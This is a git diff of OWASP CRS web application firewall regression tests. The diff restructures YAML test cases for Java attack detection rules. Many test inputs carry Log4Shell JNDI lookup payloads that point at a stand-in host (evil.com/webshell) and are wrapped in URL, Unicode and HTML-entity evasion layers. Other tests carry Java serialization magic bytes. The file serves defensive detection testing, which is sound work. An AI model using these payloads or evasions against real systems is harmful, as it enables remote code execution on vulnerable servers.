- data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-26 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log_contains: id "944152" + - test_id: 26 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' + version: "HTTP/1.1" + output: + log_contains: id "944152" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml index 288c536ec..a5af12663 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -1,17 +1,15 @@ --- meta: author: "spartantri" - enabled: true - name: "944200.yaml" description: "Description" +rule_id: 944200 tests: - - test_title: 944200-1 + - test_id: 1 desc: Argument test includes java serialization magic bytes, base64 encoded request stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE9XQVNQIE1vZFNlY3VyaXR5IENvcmUgUnVsZSBTZXQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiA5DQoNCnRlc3Q9rO0ABQ0KDQo=" - output: - log_contains: "id \"944200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE9XQVNQIE1vZFNlY3VyaXR5IENvcmUgUnVsZSBTZXQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiA5DQoNCnRlc3Q9rO0ABQ0KDQo=" + output: + log_contains: "id \"944200\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml index da10d5c1b..01a32eea9 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml @@ -1,1108 +1,1056 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944210.yaml" description: "Positive tests for rule 944210" +rule_id: 944210 tests: - - test_title: 944210-1 + - test_id: 1 desc: "Argument test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_id: 2 desc: "Argument name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log_contains: "id \"944210\"" + - test_id: 3 desc: "Cookie test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 4 desc: "Cookie name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: rO0ABQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 5 desc: "Request header test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_id: 6 desc: "XML element includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_id: 7 desc: "XML attribute name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_id: 8 desc: "XML attribute value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_id: 9 desc: "XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_id: 10 desc: "Nested XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_id: 11 desc: "Content-Type text/plain includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_id: 12 desc: "Content-Type application/json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"rO0ABQ\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log_contains: "id \"944210\"" + - test_id: 13 desc: "Content-Type application/json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"rO0ABQ\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-15 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-16 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - rO0ABQ - 